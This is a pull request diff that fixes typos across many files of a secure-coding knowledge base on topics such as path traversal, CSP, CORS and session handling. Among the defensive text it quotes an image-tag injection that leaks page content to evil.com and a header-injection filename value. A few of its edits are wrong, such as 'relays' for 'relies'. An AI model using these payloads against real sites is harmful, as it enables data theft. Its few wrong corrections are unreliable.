### PR TITLE
Fix typos in knowledge base

### DIFF
--- a/skf/markdown/knowledge_base/1-knowledge_base--Filename_injection_Path_traversel--.md
+++ b/skf/markdown/knowledge_base/1-knowledge_base--Filename_injection_Path_traversel--.md
@@ -1,5 +1,5 @@
 
-Filename Injection / Path Traversel 
+Filename Injection / Path Traversal 
 -------
 
 **Description:**

--- a/skf/markdown/knowledge_base/104-knowledge_base--Content_type_headers--.md
+++ b/skf/markdown/knowledge_base/104-knowledge_base--Content_type_headers--.md
@@ -4,7 +4,7 @@ Content type headers
 
 **Description:**
 
-Setting the right content headers is importent for hardening your applications security,
+Setting the right content headers is important for hardening your applications security,
 this reduces exposure to drive-by download attacks or sites serving user uploaded 
 content that, by clever naming could be treated by MS Internet Explorer as executable or 
 dynamic HTML files and thus can lead to security vulnerabilities.

--- a/skf/markdown/knowledge_base/105-knowledge_base--Malicious_intent--.md
+++ b/skf/markdown/knowledge_base/105-knowledge_base--Malicious_intent--.md
@@ -14,7 +14,7 @@ Also verify, that third party components come from trusted repositories.
 **Solution:**
 
 Running your code through a static code analyser or auditing tools could give you a change 
-to find malicious peaces of code which could be embedded into the software. 
+to find malicious pieces of code which could be embedded into the software. 
 Also if the new or adjusted functionality is critical then check manually it in the form 
 of a code review for back doors, Easter eggs, and logic flaws.
 

--- a/skf/markdown/knowledge_base/106-knowledge_base--Sandboxing--.md
+++ b/skf/markdown/knowledge_base/106-knowledge_base--Sandboxing--.md
@@ -15,7 +15,7 @@ an extra layer of security where an attacker first need to break out from.
 Use the sandbox attribute of an iframe for untrusted content. The sandbox attribute of an 
 iframe enables restrictions on content within a iframe. The following restrictions are 
 
-active when the sandbox attribute is set: 
+Active when the sandbox attribute is set: 
 
 - All markup is treated as being from a unique origin
 - All forms and scripts are disabled. 

--- a/skf/markdown/knowledge_base/108-knowledge_base--Server_side_validation--.md
+++ b/skf/markdown/knowledge_base/108-knowledge_base--Server_side_validation--.md
@@ -17,7 +17,7 @@ is to process this data server-side and validate the data to see if it returns e
 values. If not these failures should be logged.
 
 Also important to always verify that the same access control rules implied by the presentation layer 
-are enforced on the serverside.
+are enforced on the server-side.
 
 Recommended knowledge base items:
 

--- a/skf/markdown/knowledge_base/112-knowledge_base--Cross_origin_resource_sharing--.md
+++ b/skf/markdown/knowledge_base/112-knowledge_base--Cross_origin_resource_sharing--.md
@@ -38,7 +38,7 @@ Use the Access-Control-Allow-Origin header only on chosen URLs that need to be
 accessed cross-domain. Don't use the header for the whole domain.
 
 3. Allow only selected, trusted domains in the Access-Control-Allow-Origin header. 
-Prefer whitelisting domains over blacklisting or allowing any domain 
+Prefer white-listing domains over blacklisting or allowing any domain 
 (do not use * wildcard nor blindly return the Origin header content without any checks)
 
 4. Keep in mind that CORS does not prevent the requested data from going to an

--- a/skf/markdown/knowledge_base/113-knowledge_base--Prevent_password_leaking--.md
+++ b/skf/markdown/knowledge_base/113-knowledge_base--Prevent_password_leaking--.md
@@ -19,7 +19,7 @@ set input field type to password.
 
 Set autocomplete=off for the password input field. 
 This turns off the auto complete and remember password features of the browser.
-**NOTE:** for some browsers this means you have to put al the input fields the form contains
+**NOTE:** for some browsers this means you have to put all the input fields the form contains
 to autocomplete=off, otherwise it will not comply.
 
 Also whenever a user has the opportunity to use password forget functions

--- a/skf/markdown/knowledge_base/114-knowledge_base--All_authentication_controls_must_fail_securely--.md
+++ b/skf/markdown/knowledge_base/114-knowledge_base--All_authentication_controls_must_fail_securely--.md
@@ -15,7 +15,7 @@ from a security mechanism:
 3. exception
 
 In general, you should design your security mechanism so that a failure will follow the same execution path
-as disabeling the operation
+as disabling the operation
 
 **Solution:**
 

--- a/skf/markdown/knowledge_base/117-knowledge_base--Canonicalized_user_input--.md
+++ b/skf/markdown/knowledge_base/117-knowledge_base--Canonicalized_user_input--.md
@@ -10,5 +10,5 @@ misses a malicious input which could execute into a successful attack on your ap
 
 **Solution:**
 
-All userinput should be validated whenever the user-input string is complete and is being 
+All user-input should be validated whenever the user-input string is complete and is being 
 processed by your application.

--- a/skf/markdown/knowledge_base/125-knowledge_base--Aggregate_user_requests--.md
+++ b/skf/markdown/knowledge_base/125-knowledge_base--Aggregate_user_requests--.md
@@ -4,7 +4,7 @@ Aggregate user requests
 
 **Description:**
 
-verify the system can protect against aggregation or continuous access to functions,  
+Verify the system can protect against aggregation or continuous access to functions,  
 resources, or data. For example, possibly by the use of a resource governor to limit the 
 number of edits per minute in order to to prevent an automatic attack
 

--- a/skf/markdown/knowledge_base/13-knowledge_base--File_upload_injections--.md
+++ b/skf/markdown/knowledge_base/13-knowledge_base--File_upload_injections--.md
@@ -30,7 +30,7 @@ Uploaded files always needs to be placed outside the document root of the web-se
 You should also check the user-input(filename) for having the right 
 allowed extensions such as .jpg, .png etc.
 
-note: when checking these extensions always make sure your application validates the last
+Note: when checking these extensions always make sure your application validates the last
 possible extension so an attacker could not simply inject ".jpg.php" and bypass your
 validation
 
@@ -38,7 +38,7 @@ After this validation you must also check the user-input(filename) for containin
 path traversal patterns in order to prevent him from uploading outside of 
 the intended directory.
 
-Most developers also do a mime-type check. this is a good protection however not 
+Most developers also do a mime-type check. This is a good protection however not 
 whenever you are checking this mime-type through the post request. This header can not be
 trusted since it can be easily manipulated by an attacker. 
 
@@ -50,6 +50,6 @@ You may also want to check if the filenames do already exist before uploading in
 prevent the overwriting of files.
 
 Also for serving the files back there needs to be a file handler function that can select 
-the file based on an identifier that wil serve the file back towards the user.
+the file based on an identifier that will serve the file back towards the user.
 
 	

--- a/skf/markdown/knowledge_base/134-knowledge_base--Distinguish_log-fields_from_trusted_and_untrusted_sources--.md
+++ b/skf/markdown/knowledge_base/134-knowledge_base--Distinguish_log-fields_from_trusted_and_untrusted_sources--.md
@@ -12,7 +12,7 @@ untrusted log fields in your log entries your logs become clearer and more trans
 
 Verify that log fields from trusted and untrusted sources are distinguishable in 
 log entries. If possible it is highly recommended that you separate these files 
-entirely from each other so the logs with untrusted userinput cannot corrupt the
+entirely from each other so the logs with untrusted user-input cannot corrupt the
 system generated logs.
 
 Recommended knowledge base items:

--- a/skf/markdown/knowledge_base/144-knowledge_base--Data_from_untrusted_sources--.md
+++ b/skf/markdown/knowledge_base/144-knowledge_base--Data_from_untrusted_sources--.md
@@ -5,7 +5,7 @@ Data from untrusted sources
 **Description:**
 
 Whenever data from untrusted servers is executed by your application there is a high 
-probability this data could be contaminated with malicious code. such as for example 
+probability this data could be contaminated with malicious code. Such as for example 
 XSS from JSON files, or XXE when parsing XML files. 
 
 

--- a/skf/markdown/knowledge_base/145-knowledge_base--User_restriction_for_sensitive_data--.md
+++ b/skf/markdown/knowledge_base/145-knowledge_base--User_restriction_for_sensitive_data--.md
@@ -4,7 +4,7 @@ User restriction for sensitive data
 
 **Description:**
 
-Aways enforce multiple layers of security whenever you want to protect sensitive data/files 
+Always enforce multiple layers of security whenever you want to protect sensitive data/files 
 on your application. If one layer should fail the other layers should prevent the attackers 
 from succeeding.
 

--- a/skf/markdown/knowledge_base/149-knowledge_base--cryptographic_modules_must_fail_securely--.md
+++ b/skf/markdown/knowledge_base/149-knowledge_base--cryptographic_modules_must_fail_securely--.md
@@ -1,5 +1,5 @@
 
-cryptographic modules must fail securely
+Cryptographic modules must fail securely
 -------
 
 **Description:**

--- a/skf/markdown/knowledge_base/151-knowledge_base--Enforce_policys_for_sensitive_data_processing--.md
+++ b/skf/markdown/knowledge_base/151-knowledge_base--Enforce_policys_for_sensitive_data_processing--.md
@@ -1,10 +1,10 @@
 
-Enforce policys for sensitive data processing
+Enforce policies for sensitive data processing
 -------
 
 **Description:**
 
-When you proces data you should always enforce policies for the transfer of sensitive data 
+When you process data you should always enforce policies for the transfer of sensitive data 
 in order to enforce higher level of security imposing structured thresholds to 
 fend of attackers.
 
@@ -22,10 +22,10 @@ Also, determine whenever data storage is necessary or becomes a redundancy.
 Whenever sensitive data does not have to be stored don't store it. This reduces the
 quantity of data may your application ever be compromised.
 
-Ultimatly, verify accessing sensitive data is logged, if the data is collected under 
+Ultimately, verify accessing sensitive data is logged, if the data is collected under 
 relevant data protection directives or where logging of accesses is required.  
 
-sensitive data or primary keys, such as personally identifiable information or credit 
+Sensitive data or primary keys, such as personally identifiable information or credit 
 cards should also be anonymized, masked or truncated on the server before transmission 
 to the client. 
 	

--- a/skf/markdown/knowledge_base/152-knowledge_base--Access_control_pattern--.md
+++ b/skf/markdown/knowledge_base/152-knowledge_base--Access_control_pattern--.md
@@ -11,7 +11,7 @@ consideration before you start developing this type of functionality.
 
 **Solution:**
 
-It is highly recommended to study al the listed items and implement these principles in 
+It is highly recommended to study all the listed items and implement these principles in 
 your access control/login system in order to enforce a higher level of security.
 
 1. Audit logs

--- a/skf/markdown/knowledge_base/154-knowledge_base--Sessions_pattern--.md
+++ b/skf/markdown/knowledge_base/154-knowledge_base--Sessions_pattern--.md
@@ -6,7 +6,7 @@ Sessions - pattern
 
 When working with sessions there are a couple of things you need to consider in order
 to implement them securely throughout your system. For more detailed information about
-these items you should check te knowledge-base about:
+these items you should check the knowledge-base about:
 
 1.  Session management control
 2.  Session cookies without the Secure flag

--- a/skf/markdown/knowledge_base/155-knowledge_base--Submit_forms_pattern--.md
+++ b/skf/markdown/knowledge_base/155-knowledge_base--Submit_forms_pattern--.md
@@ -34,4 +34,4 @@ order to ensure higher level of security.
 
 Fourth, Whenever the application is sending sensitive data through the form submit
 this data must always be send through an POST variable instead of an GET since
-a GET will leak this data through the url by example the referer header.
+a GET will leak this data through the url by example the referrer header.

--- a/skf/markdown/knowledge_base/157-knowledge_base--User_registration_pattern--.md
+++ b/skf/markdown/knowledge_base/157-knowledge_base--User_registration_pattern--.md
@@ -27,7 +27,7 @@ Here are the steps described briefly.
 For more detailed information you should look into these items in the knowledge base.
 
 First, You enforce limits on the length of the users submits on the server side in order
-to prevent him from truncating his submits. these limits have to correlate with the limits
+to prevent him from truncating his submits. These limits have to correlate with the limits
 you set in your column in the database.
 
 Second, you should create a single user input validation control class which should 

--- a/skf/markdown/knowledge_base/159-knowledge_base--HTML_injections--.md
+++ b/skf/markdown/knowledge_base/159-knowledge_base--HTML_injections--.md
@@ -25,9 +25,9 @@ or encode user data before you display it on screen as HTML.
 2.Image tag injection occurs whenever an attacker injects a broken image tag with a non terminated
 parameter like : "img src='http://evil.com?steal.php?value=
 Every content after value= parameter will now be stolen and send to evil.com by the attacker 
-till the injection finds the next occurence of a matching single quote.
+till the injection finds the next occurrence of a matching single quote.
 
-Again you should sanitise and encode the userinput to prevent an image tag from being injected
+Again you should sanitise and encode the user-input to prevent an image tag from being injected
 in your application. For whenever a user is permitted to submit an image on your application
 enforce and verify the application accepts valid non-broken tags only.
  
@@ -38,13 +38,13 @@ properly encoding and sanitising your user-inputs.
 4.Whenever an attacker injects a "base" tag into your application it can steal data because
 the <base> tag specifies the base URL/target to where to process his data to.
 
-The solution to base jumping would be to us absolut paths in your application such as:
+The solution to base jumping would be to us absolute paths in your application such as:
 action='/update_profile.php'
 
 instead of:
 action='update_profile.php'
 
-5/6. can both also easily be prevented simply be encoding or sanitising your userinput
+5/6 can both also easily be prevented simply be encoding or sanitising your user-input
 submitted towards your application.
 
 Always validate your user-input on a high level(server side constraint). Whenever your 

--- a/skf/markdown/knowledge_base/160-knowledge_base--RFD_and_file_download_injections--.md
+++ b/skf/markdown/knowledge_base/160-knowledge_base--RFD_and_file_download_injections--.md
@@ -5,17 +5,17 @@ Reflective file download and File download injections
 **Description:**
 
 Reflective file download occurs whenever an attacker can "forge" a download through
-misconfigurations in your "disposition" and "content type" headers. Instead of having
+misconfiguration in your "disposition" and "content type" headers. Instead of having
 the attacker to upload a evil file to the webserver he can now force the browser to 
 download a malicious file by abusing these headers and setting the file extension to any 
 type he wants.
 
-Now, whenever there is also userinput being reflected back into that download it can be 
-used to forge evil attacks. the attacker can present an evil file to ignorant vicim's who 
+Now, whenever there is also user-input being reflected back into that download it can be 
+used to forge evil attacks. The attacker can present an evil file to ignorant victim's who 
 are trusting the domain of which the download was presented from. 
 
 File download injection is a similar type of attack except this attack is made possible
-whenever there is userinput that is reflected into the "filename=" paramater in the 
+whenever there is user-input that is reflected into the "filename=" parameter in the 
 "disposition" header. The attacker again can force the browser to download a file with his
 own choice of extension and set the content of this file by injecting this directly
 into the response like: filename=evil.bat%0A%0D%0A%0DinsertEvilStringHere
@@ -25,19 +25,19 @@ the targets device.
 
 **Solution:**
 
-First of al never use userinput directly into your headers since an attacker can now
+First of all never use user-input directly into your headers since an attacker can now
 take control over it. 
 
 Secondly you should check if a filename really does exist before 
-presenting it towards the users. You could also create a whitelist of al files which
+presenting it towards the users. You could also create a whitelist of all files which
 are allowed to be downloaded and terminate requests whenever they do not match.
 
 Also you should disable the use of "path parameters". It increases the attackers attack 
 vector and these parameters also cause a lot of other vulnerabilities.
 
-And last you should sanitise and encode al your userinput as much as possible.
-reflective file downloads depends on user-input being reflected in the response header.
-Whenever this input has been sanitised and encoded it should not do any harm to any 
+And last you should sanitize and encode all your user-input as much as possible.
+Reflective file downloads depends on user-input being reflected in the response header.
+Whenever this input has been sanitized and encoded it should not do any harm to any 
 system it is being executed on.
 
  

--- a/skf/markdown/knowledge_base/161-knowledge_base--identify_all_application_components--.md
+++ b/skf/markdown/knowledge_base/161-knowledge_base--identify_all_application_components--.md
@@ -6,7 +6,7 @@ Identify all application components
 When you are building an application you first want to map where you are placing 
 source files, libraries and executables.
 
-With these components identified and mapped, it becomes transparant where possible 
+With these components identified and mapped, it becomes transparent where possible 
 pitfalls might be in your application and increases the maintainability of the 
 system. Also you have an indicator where possible reinforcements have to be
 implemented to avoid attacks.(i.e places where your application contains executable's)

--- a/skf/markdown/knowledge_base/162-knowledge_base--identify_external_dependencies--.md
+++ b/skf/markdown/knowledge_base/162-knowledge_base--identify_external_dependencies--.md
@@ -11,8 +11,8 @@ attacks.
 
 **Solution:**
 
-First you must identify which external dependencies your application relys on 
-for its operation. second, there should be a fail safe implemented should this dependency ever
+First you must identify which external dependencies your application relays on 
+for its operation. Second, there should be a fail safe implemented should this dependency ever
 fail to deliver its services towards your application. 
 
 

--- a/skf/markdown/knowledge_base/163-knowledge_base--High_level_architecture_should_be_defined--.md
+++ b/skf/markdown/knowledge_base/163-knowledge_base--High_level_architecture_should_be_defined--.md
@@ -5,7 +5,7 @@ High level architecture should be defined.
 
 Whenever you are developing an application you want to map all the architecture
 it contains. Whenever there are breaches, updates, or other escalations it makes it
-easy and transparant for forensics, operators and developers to do their job as fast as 
+easy and transparent for forensics, operators and developers to do their job as fast as 
 possible. 
 
 

--- a/skf/markdown/knowledge_base/164-knowledge_base--Threat_modeling--.md
+++ b/skf/markdown/knowledge_base/164-knowledge_base--Threat_modeling--.md
@@ -14,9 +14,9 @@ assessing application threats and vulnerabilities.
 
 Threat modeling is best applied continuously throughout a software development project. 
 The process is essentially the same at different levels of abstraction, although the 
-information gets more and more granular throughout the lifecycle. Ideally, a high-level 
+information gets more and more granular throughout the life-cycle. Ideally, a high-level 
 threat model should be defined in the concept or planning phase, and then refined 
-throughout the lifecycle. As more details are added to the system, new attack vectors are 
+throughout the life-cycle. As more details are added to the system, new attack vectors are 
 created and exposed. The ongoing threat modeling process should examine, diagnose, and 
 address these threats.
 

--- a/skf/markdown/knowledge_base/166-knowledge_base--Client_side_validation--.md
+++ b/skf/markdown/knowledge_base/166-knowledge_base--Client_side_validation--.md
@@ -18,7 +18,7 @@ an XSS attack through no fault of the server-side code.
 **Solution:**
 
 First there must be a client side input validation method as you would apply to the server
-side. This means you should also apply input rejection as wel as typecasting and such.
+side. This means you should also apply input rejection as well as typecasting and such.
 This is to prevent users from being attacked by XSS attacks which are undetectable by
 the server.
 

--- a/skf/markdown/knowledge_base/167-knowledge_base--Positive_validation_model--.md
+++ b/skf/markdown/knowledge_base/167-knowledge_base--Positive_validation_model--.md
@@ -3,18 +3,18 @@ Positive validation model
 
 **Description:**
 
-There are two populair methods in handeling input validation. The first is blacklisting
+There are two popular methods in handling input validation. The first is blacklisting
 and the second one is the whitelisting method, also known as a positive validation model.
 
 The big disadvantage of the blacklisting model would be that an attacker has a great
 diversity into forging his attack strings and payloads which can make it hard for your
-application to detect al of them. It would also be very time consuming importing al of 
+application to detect all of them. It would also be very time consuming importing all of 
 them into your system.
 
 Whenever you are using a positive validation model you are simply checking for the input 
 you were expecting as defined in your applications operation, for example:
 
-Let's say you have a form and was expecting the form to return the value of a checkbox.
+Let's say you have a form and was expecting the form to return the value of a check-box.
 This would be a fixed value, yes or no. Whenever the value diverges of the expected
 input as was intended in the applications operation you can now assume there was an
 intercepting proxy tampering these values and act accordingly to it.
@@ -22,12 +22,12 @@ intercepting proxy tampering these values and act accordingly to it.
 Same goes for whenever you were expecting just a string, integer, alphanumeric character
 or even special strings such as names as an o'reily.
 
-This methods also makes your code clear, transparant and highly maintainable.
+This methods also makes your code clear, transparent and highly maintainable.
 
 **Solution:**
 
 First there must be a client side input validation method as you would apply to the server
-side. This means you should also apply input rejection as wel as typecasting and such.
+side. This means you should also apply input rejection as well as typecasting and such.
 This is to prevent users from being attacked by XSS attacks which are undetectable by
 the server.
 

--- a/skf/markdown/knowledge_base/168-knowledge_base--TLS_certificate_public_key_pinning--.md
+++ b/skf/markdown/knowledge_base/168-knowledge_base--TLS_certificate_public_key_pinning--.md
@@ -22,7 +22,7 @@ remote host's identity by validating its certificate or public key. While pinnin
 not have to occur in an OnConnect callback, its often most convenient because the 
 underlying connection information is readily available. 
 
-for more extended information on different types of implementation please see:
+For more extended information on different types of implementation please see:
 https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning
 
 

--- a/skf/markdown/knowledge_base/169-knowledge_base--HSTS_preload--.md
+++ b/skf/markdown/knowledge_base/169-knowledge_base--HSTS_preload--.md
@@ -38,5 +38,5 @@ Adding your website to the list:
 https://www.chromium.org/hsts     
 
 
-source:
+Source:
 https://wiki.mozilla.org/Privacy/Features/HSTS_Preload_List

--- a/skf/markdown/knowledge_base/17-knowledge_base--Robots.txt--.md
+++ b/skf/markdown/knowledge_base/17-knowledge_base--Robots.txt--.md
@@ -12,14 +12,14 @@ the application displaying sensitive information to attackers.
 
 **Solution:**
 
-instead of the blacklisting method:
+Instead of the blacklisting method:
 
 User-agent: * 
 Disallow: /squirrelmail/
 Disallow: /admin/
 Disallow: /modules/
 
-you should use a whitelisting method:
+You should use a whitelisting method:
 
 User-agent: * 
 Disallow: * 

--- a/skf/markdown/knowledge_base/172-knowledge_base--STRIDE--.md
+++ b/skf/markdown/knowledge_base/172-knowledge_base--STRIDE--.md
@@ -19,7 +19,7 @@ Elevation of privilege
 In the context of network security, a spoofing attack is a situation in which one person 
 or program successfully masquerades as another by falsifying data and thereby gaining an 
 illegitimate advantage. There are a lot of different types of spoofing you have to take
-into account for example: TCP/IP, Referer, ID, or Email spoofing. 
+into account for example: TCP/IP, Referrer, ID, or Email spoofing. 
 
 For Tampering we recommend to read the following knowledge base items:
 
@@ -35,8 +35,8 @@ For information disclosure we recommend to read the following knowledge base ite
 
 - Verbose error messaging
 - Session information is not stored server-side
-- Sensitive information transmitted by un-encrypted methods
-- Enforce policys for sensitive data processing
+- Sensitive information transmitted by unencrypted methods
+- Enforce policies for sensitive data processing
 - Verify that the session id is never disclosed
 - Username enumeration
 - Differential analysis 

--- a/skf/markdown/knowledge_base/175-knowledge_base--JSON_XML_schema--.md
+++ b/skf/markdown/knowledge_base/175-knowledge_base--JSON_XML_schema--.md
@@ -4,8 +4,8 @@ JSON, XML schema
 
 **Description:**
 
-When adding schema's to your JSON or XML files you have better controll over what 
-type of userinput can be supplied in your application. This dramatically decreases an
+When adding schema's to your JSON or XML files you have better control over what 
+type of user-input can be supplied in your application. This dramatically decreases an
 attackers attack vector when implemented the right way. Nonetheless you should always 
 apply your own input validation and rejection as extra layer of defence. This approach 
 is also desirable since you also want to do countering and logging on the users 

--- a/skf/markdown/knowledge_base/176-knowledge_base--Limiting_user_input_size--.md
+++ b/skf/markdown/knowledge_base/176-knowledge_base--Limiting_user_input_size--.md
@@ -4,8 +4,8 @@ Limiting the size of user input
 
 **Description:**
 
-Whenever there is userinput supplied into your application you also want to limit
-the size of the userinput to appropriate maximum lengths.
+Whenever there is user-input supplied into your application you also want to limit
+the size of the user-input to appropriate maximum lengths.
  
 **Solution:**
 

--- a/skf/markdown/knowledge_base/177-knowledge_base--Parsing_data__exchange_formats--.md
+++ b/skf/markdown/knowledge_base/177-knowledge_base--Parsing_data__exchange_formats--.md
@@ -5,8 +5,8 @@ Parsing data exchange formats
 **Description:**
 
 Whenever you are parsing data exchange formats such as, XML, JSON, CSV, etc, you
-have to make sure that whenever these data files contain malicious code this wil not be
-executed by your application. You should also not solely depend on your parser to do al 
+have to make sure that whenever these data files contain malicious code this will not be
+executed by your application. You should also not solely depend on your parser to do all 
 the encoding and escaping for you since there could always be an edge case that does 
 execute certain attacks. 
 

--- a/skf/markdown/knowledge_base/178-knowledge_base--Content_security_policy_headers--.md
+++ b/skf/markdown/knowledge_base/178-knowledge_base--Content_security_policy_headers--.md
@@ -29,7 +29,7 @@ Must become this:
 	<script src='doSomething.js'></script>
 	<button id='somethingToDo'>Let's foobar!</button>
 	
-the header for this code could look something like:
+The header for this code could look something like:
     Content-Security-Policy: default-src'self'; object-src'none'; script-src'https://mycdn.com'
 
 Since it is not entirely realistic to implement all javascript on external pages we can
@@ -44,7 +44,7 @@ would become guessable. So it should also contain a high entropy and should be h
 predict. Similar to the operation of the CSRF tokens, the nonce becomes impossible for
 the attacker to predict making it difficult to execute a succesfull XSS attack.
 
-Inline javscript example containing nonce: 
+Inline javascript example containing nonce: 
 	<script nonce=sfsdf03nceI23wlsgle9h3sdd21>
     <!-- Your javscript code -->
     </script>
@@ -53,10 +53,10 @@ Matching header example:
     Content-Security-Policy: script-src 'nonce-sfsdf03nceI23wlsgle9h3sdd21'
     
 There is a whole lot more to learn about the CSP header for in depth implementation in 
-your application. this knowledge base item just scratches the surface and it would be
-highly recommended to gain more in depth knowledge about this powerfull header.
+your application. This knowledge base item just scratches the surface and it would be
+highly recommended to gain more in depth knowledge about this powerful header.
 
-**Very Important!** When applying the CSP header, although it bloks XSS attacks. Your 
+**Very Important!** When applying the CSP header, although it blocks XSS attacks. Your 
 application still remains vulnerable to HTML and other code injections. So this is **not**
 a substitute for, validation, sanitizing and encoding of user-input. 
   

--- a/skf/markdown/knowledge_base/179-knowledge_base--Safe_javascript_jquery_methods--.md
+++ b/skf/markdown/knowledge_base/179-knowledge_base--Safe_javascript_jquery_methods--.md
@@ -1,5 +1,5 @@
 
-Safe javscript and jquery methods
+Safe javascript and jquery methods
 -------
 
 **Description:**
@@ -12,7 +12,7 @@ injections.
 **Solution:**
 
 Below we listed some safe functions for whenever it is needed to supply your 
-javscript/jquery functions with user-input.
+javascript/jquery functions with user-input.
 
 JQUERY functions:
 .txt();
@@ -22,7 +22,7 @@ JQUERY functions:
 Example:
 	<script>
 	function myFunction() {
-		$( "p" ).text( "append userinput to paragrapgh safely" );
+		$( "p" ).text( "append user-input to paragrapgh safely" );
 	}
 	</script>
 
@@ -36,7 +36,7 @@ Example:
 
 	<script>
 	function myFunction() {
-   		var t = document.createTextNode("append userinput to body safely");
+   		var t = document.createTextNode("append user-input to body safely");
     	document.body.appendChild(t);
 	}
 	</script>

--- a/skf/markdown/knowledge_base/180-knowledge_base--WYSIWYG_editors--.md
+++ b/skf/markdown/knowledge_base/180-knowledge_base--WYSIWYG_editors--.md
@@ -21,9 +21,9 @@ do not understand half the functionalities the editors are providing.
 **Solution:**
 
 Download a HTML sanitizer and configure it to your specific needs. When configuring the sanitizer make sure
-you disable al unused componements. The less options an attacker has to insert into your application the less
-his attack surface becomes. Also before implementing this HTML sanitizer on a production enviroment have
-it first thorougly examined by security testers since it is a very delicate function. 
+you disable all unused components. The less options an attacker has to insert into your application the less
+his attack surface becomes. Also before implementing this HTML sanitizer on a production environment have
+it first thoroughly examined by security testers since it is a very delicate function. 
 
 
 

--- a/skf/markdown/knowledge_base/182-knowledge_base--Account_lockout--.md
+++ b/skf/markdown/knowledge_base/182-knowledge_base--Account_lockout--.md
@@ -6,7 +6,7 @@ Account lock-out
 
 All applications should contain the possibility to lock down accounts for whenever it
 detects attacks by/on users. Also you should include options for both soft and hard
-lock-out mechanismes. 
+lock-out mechanisms. 
 
  
 **Solution:**

--- a/skf/markdown/knowledge_base/185-knowledge_base--data_controller_display_layer_sepperation--.md
+++ b/skf/markdown/knowledge_base/185-knowledge_base--data_controller_display_layer_sepperation--.md
@@ -1,18 +1,18 @@
-Seperated data, controller, display layers
+Separated data, controller, display layers
 -------
 
 **Description:**
 
-The application should sepperate data, controller, and display layers in order to make your
-application more clear and understandable in terms of abstraction due to sepperation.
+The application should separate data, controller, and display layers in order to make your
+application more clear and understandable in terms of abstraction due to separation.
 
 Whenever your application is more organized and abstracted it is much easier to implement 
-less flawed security controlls.
+less flawed security controls.
 
  
 **Solution:**
 
-Make sure your different type of data layers are seperated in your application.
+Make sure your different type of data layers are separated in your application.
 
-The sepperation of these differnt layers is also know as a design pattern which goes 
+The separation of these different layers is also know as a design pattern which goes 
 by the name MVC (model, view, controller).

--- a/skf/markdown/knowledge_base/186-knowledge_base--proven_authentication_mechanisms--.md
+++ b/skf/markdown/knowledge_base/186-knowledge_base--proven_authentication_mechanisms--.md
@@ -6,8 +6,8 @@ Proven authentication mechanisms
 Whenever your application has the option for users to authenticate themselves
 your method should be "proven" and secure in the sense of that: 
 
-1. it should comply to some security stadards/guidelines
-2. Before implementing authentication on a live enviroment it has to be pentested/audited by 
+1. it should comply to some security standards/guidelines
+2. Before implementing authentication on a live environment it has to be pentested/audited by 
    professionals.
 
 **Solution:**

--- a/skf/markdown/knowledge_base/187-knowledge_base--administrative_interfaces--.md
+++ b/skf/markdown/knowledge_base/187-knowledge_base--administrative_interfaces--.md
@@ -4,8 +4,8 @@ Administrative interfaces are not accessible to untrusted parties
 **Description:**
 
 Whenever it is not necessary for administrative pages to be publicly accessible these
-pages should have restriced access for users. Whenever these pages are secluded from the rest
-of the application in terms of accessability this could reduce the attack vector of malicious users.
+pages should have restricted access for users. Whenever these pages are secluded from the rest
+of the application in terms of accessibility this could reduce the attack vector of malicious users.
 
 **Solution:**
 

--- a/skf/markdown/knowledge_base/188-knowledge_base--concurrent_session_handling--.md
+++ b/skf/markdown/knowledge_base/188-knowledge_base--concurrent_session_handling--.md
@@ -4,7 +4,7 @@ Concurrent session handling
 **Description:**
 
 You should limit and keep track of all the different active concurrent sessions.
-whenever the application discovers concurrent sessions it should always notify the user
+Whenever the application discovers concurrent sessions it should always notify the user
 about this and should give him the opportunity to end the other sessions.
 
 With this defence in place it becomes harder for attackers to hijack a users session since
@@ -13,27 +13,27 @@ they will be notified about concurrent sessions.
 **Solution:**
 
 The application should keep track and limit all the granted sessions.
-it should store your users IP adres, session id and user id. After storing these credentials
+It should store your users IP address, session id and user id. After storing these credentials
 it should do regular checks to see if there are:
 
 1. Multiple active sessions linked to same user id
-2. Mulitple active sessions from different locations
+2. Multiple active sessions from different locations
 3. Limit and destroy sessions if they become concurrent.
 
 If so, the user should be notified and given the opportunity to end the other sessions.
 
-A best practice would be to create a function which summerizes al the different active sessions
+A best practice would be to create a function which summarizes all the different active sessions
 with the opportunity to terminate them at any given time.
 
 As an extra layer of protection the user should also be prompted with the option to terminate all 
 active sessions whenever he:
 
 1. changes his password
-2. re-authenticats
+2. re-authenticates
 3. does step up or adaptive authentication
 
-Allong with the renewal of the session identifier in these steps you now have full hardened defenses against
-session hijaking attacks.
+Along with the renewal of the session identifier in these steps you now have full hardened defenses against
+session hijacking attacks.
 
 Recommended knowledgebase items:
 

--- a/skf/markdown/knowledge_base/189-knowledge_base--Auto_escaping_technology--.md
+++ b/skf/markdown/knowledge_base/189-knowledge_base--Auto_escaping_technology--.md
@@ -3,7 +3,7 @@ Auto escaping technology
 
 **Description:**
 
-Some frameworks/templates have the option to auto-escape al incomming userinput to harmless
+Some frameworks/templates have the option to auto-escape all incoming user-input to harmless
 encoded data in order to prevent attacks. However, this auto-escaping functionality is also
 optional to be disabled. Whenever this auto-escaping function has been disabled your application
 might be vulnerable to attacks like XSS.

--- a/skf/markdown/knowledge_base/19-knowledge_base--Include_anti-caching_headers--.md
+++ b/skf/markdown/knowledge_base/19-knowledge_base--Include_anti-caching_headers--.md
@@ -13,7 +13,7 @@ computer and proxies what information they may or may not store on the intermedi
 These headers are also known as the: Cache-control: no-store,no-cache and provide 
 protection of sensitive information when implemented in the application or web-server.
 
-Rightly configured anti caching headers wil look like the following as a response
+Rightly configured anti caching headers will look like the following as a response
 
 	Expires: Tue, 03 Jul 2001 06:00:00 GMT
 	Last-Modified: {now} GMT

--- a/skf/markdown/knowledge_base/190-knowledge_base--Client_side_storage--.md
+++ b/skf/markdown/knowledge_base/190-knowledge_base--Client_side_storage--.md
@@ -11,8 +11,8 @@ Therefore, it's recommended not to store any sensitive information in local stor
 **Solution:**
 
 Verify that authenticated data is cleared from client storage, such as the browser DOM, after the 
-session is terminated. This also goed for other session and local storage information which could
-assist an attacker launching an succesfull attack.
+session is terminated. This also goes for other session and local storage information which could
+assist an attacker launching an successful attack.
 
 Recommended knowledge base items:
 

--- a/skf/markdown/knowledge_base/191-knowledge_base--Log_rotation_and_seperation--.md
+++ b/skf/markdown/knowledge_base/191-knowledge_base--Log_rotation_and_seperation--.md
@@ -1,11 +1,11 @@
-Log rotation and seperation
+Log rotation and separation
 -------
 
 **Description:**
 
-Log seperation is indispensable in order to prevent it from either radically downgrading your
+Log separation is indispensable in order to prevent it from either radically downgrading your
 application its performance or even causing a Denial of service because the server becomes 
-unavailable deu to the flooding of logs.
